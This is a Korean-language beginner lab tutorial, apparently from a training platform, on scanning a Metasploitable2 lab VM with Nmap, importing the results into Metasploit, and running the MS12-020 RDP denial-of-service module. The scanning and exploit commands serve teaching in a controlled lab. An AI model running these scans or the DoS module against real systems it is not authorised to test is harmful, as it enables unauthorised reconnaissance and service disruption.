Nmap 및 Metasploit 를 활용한 네트워크 스캔 및 취약점 분석

NmapBeginner
지금 연습하기

소개

이 랩에서는 네트워크 스캔 및 취약점 분석을 위해 Nmap 과 Metasploit 을 사용하는 방법을 배우게 됩니다. Nmap (Network Mapper) 은 네트워크 검색 및 보안 감사를 위한 강력한 오픈 소스 유틸리티이며, Metasploit 은 다양한 익스플로잇 도구와 페이로드를 포함하는 널리 사용되는 침투 테스트 프레임워크입니다.

이 랩의 목표는 Nmap 을 사용하여 다양한 유형의 스캔을 수행하고, 결과를 분석하며, Metasploit 을 활용하여 대상 시스템의 잠재적인 취약점을 더 자세히 탐색하는 실질적인 경험을 제공하는 것입니다.

이것은 가이드 실험입니다. 학습과 실습을 돕기 위한 단계별 지침을 제공합니다.각 단계를 완료하고 실무 경험을 쌓기 위해 지침을 주의 깊게 따르세요. 과거 데이터에 따르면, 이것은 초급 레벨의 실험이며 완료율은 97%입니다.학습자들로부터 96%의 긍정적인 리뷰율을 받았습니다.

환경 설정

이 단계에서는 Kali Linux 컨테이너와 Metasploitable2 가상 머신을 시작하여 랩 환경을 설정합니다.

sudo virsh start Metasploitable2

대상 머신이 시작될 때까지 기다립니다. 1~3 분 정도 소요될 수 있습니다.

가상 머신이 실행 중인지 확인하기 위해 ping 을 수행합니다.

ping 192.168.122.102

다음으로, Kali Linux 컨테이너를 시작하고 bash 환경에 진입합니다.

docker run -ti --network host b5b709a49cd5 bash

Kali 컨테이너에서 가상 네트워크 연결을 테스트합니다. Ctrl-C 를 사용하여 ping 을 종료합니다.

ping 192.168.122.102

Nmap 기본 사용법

이 단계에서는 호스트 검색, 포트 스캔, 버전 감지 및 운영 체제 감지와 같은 기본적인 스캔 작업을 위해 Nmap 을 사용하는 방법을 배우게 됩니다.

다음 명령을 실행하여 포괄적인 스캔을 수행합니다.

nmap -T4 -A 192.168.122.102

다음 명령을 실행하여 호스트 검색을 스캔합니다.

nmap -T4 -sn 192.168.122.102

다음 명령을 실행하여 포트 스캔을 수행합니다.

nmap -T4 192.168.122.102

다음 명령을 실행하여 운영 체제 감지를 수행합니다.

nmap -T4 -O 192.168.122.102

-T4 옵션은 타이밍 템플릿을 공격적인 스캔으로 설정하고, -A 옵션은 OS 감지, 버전 스캔, 스크립트 스캔 및 traceroute 를 활성화합니다. -sn 옵션은 간단한 호스트 검색 스캔을 수행하고, -O 옵션은 원격 운영 체제를 감지하려고 시도합니다.

Nmap 고급 사용법

이 단계에서는 전체 서브넷 스캔, 특정 포트 범위 스캔, 네트워크 인터페이스 지정과 같은 더 고급 Nmap 스캔 기술을 탐구합니다.

다음 명령을 실행하여 전체 서브넷을 스캔합니다.

nmap 127.0.0.1/24

다음 명령을 실행하여 특정 포트를 스캔합니다.

nmap -p80,22,66 127.0.0.1

다음 명령을 실행하여 로컬 네트워크 인터페이스를 나열합니다.

nmap --iflist

다음 명령을 실행하여 네트워크 인터페이스를 지정합니다.

nmap -e eth0 127.0.0.1

이러한 고급 기술을 통해 스캔을 미세 조정하고 대상 네트워크 또는 호스트에 대한 더 자세한 정보를 수집할 수 있습니다.

Nmap 스캔 결과 Metasploit 로 가져오기

이 단계에서는 추가 분석 및 익스플로잇을 위해 Nmap 스캔 결과를 Metasploit 로 가져오는 방법을 배우게 됩니다.

  1. 다음 명령을 실행하여 포괄적인 스캔을 수행하고 출력을 XML 파일로 저장합니다. XML 파일을 홈 디렉토리 ~/에 넣어야 합니다. 이 단계는 시간이 걸릴 수 있습니다.
nmap -sV -Pn -oX ~/shiyanlou.xml 192.168.122.102/24
  1. Metasploit 콘솔을 시작합니다.
cd ~
service postgresql start
msfdb init
msfconsole
  1. Metasploit 콘솔에서 다음 명령을 실행하여 XML 파일을 Metasploit 로 가져옵니다.
db_import shiyanlou.xml
  1. Metasploit 콘솔에서 다음 명령을 실행하여 가져온 서비스를 확인합니다.
services
  1. Metasploit 콘솔을 종료하고 검사를 시작하려면 Ctrl+D 를 누르십시오.

Nmap 스캔 결과를 Metasploit 로 가져오면 Metasploit 프레임워크에서 사용할 수 있는 강력한 도구와 모듈을 활용하여 대상 시스템의 취약점을 분석하고 잠재적으로 익스플로잇할 수 있습니다.

Metasploit 에서 모듈 사용하기

이 단계에서는 Metasploit 프레임워크 내에서 모듈을 검색하고 사용하는 방법을 배우게 됩니다.

  1. 우선, Metasploit 콘솔에 있지 않은 경우 Metasploit 콘솔을 시작해야 합니다.
cd ~
msfconsole
  1. 이제 Metasploit 콘솔에서 search 명령을 사용하여 모듈을 검색할 수 있습니다.
search ms12-020
  1. Metasploit 콘솔에서 모듈을 사용하려면:
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
  1. Metasploit 콘솔에서 모듈에 대한 사용 가능한 옵션을 표시합니다.
show options
  1. Metasploit 콘솔에서 필수 옵션을 설정합니다.
set RHOST 192.168.122.102
  1. Metasploit 콘솔에서 모듈을 실행합니다.
exploit
  1. Metasploit 콘솔을 종료하고 검사를 시작하려면 Ctrl+D 를 누르십시오.

Metasploit 는 익스플로잇, 페이로드, 보조 모듈 등 다양한 목적으로 광범위한 모듈을 제공합니다. 적절한 모듈을 검색하고 사용함으로써 대상 시스템에서 취약점을 익스플로잇하거나 다른 작업을 수행할 수 있습니다.

요약

이 랩에서는 네트워크 스캔 및 정보 수집을 위해 Nmap 을 사용하는 방법과 추가 분석 및 익스플로잇을 위해 스캔 결과를 Metasploit 로 가져오는 방법을 배웠습니다. 호스트 검색, 포트 스캔, 버전 감지 및 운영 체제 감지를 포함한 다양한 Nmap 스캔 기술에 대한 실습 경험을 얻었습니다. 또한 대상 시스템에서 잠재적으로 취약점을 익스플로잇하기 위해 Metasploit 프레임워크 내에서 모듈을 검색하고 사용하는 방법을 배웠습니다.

랩 전체에서 통제된 환경 설정, 정찰 수행, 잠재적 취약점 분석과 같은 침투 테스트에 필수적인 기술을 연습했습니다. 이러한 기술은 사이버 보안 분야에서 매우 중요하며 네트워크 보안 개념과 윤리적 해킹 기술에 대한 더 깊은 이해를 개발하는 데 도움이 될 것입니다.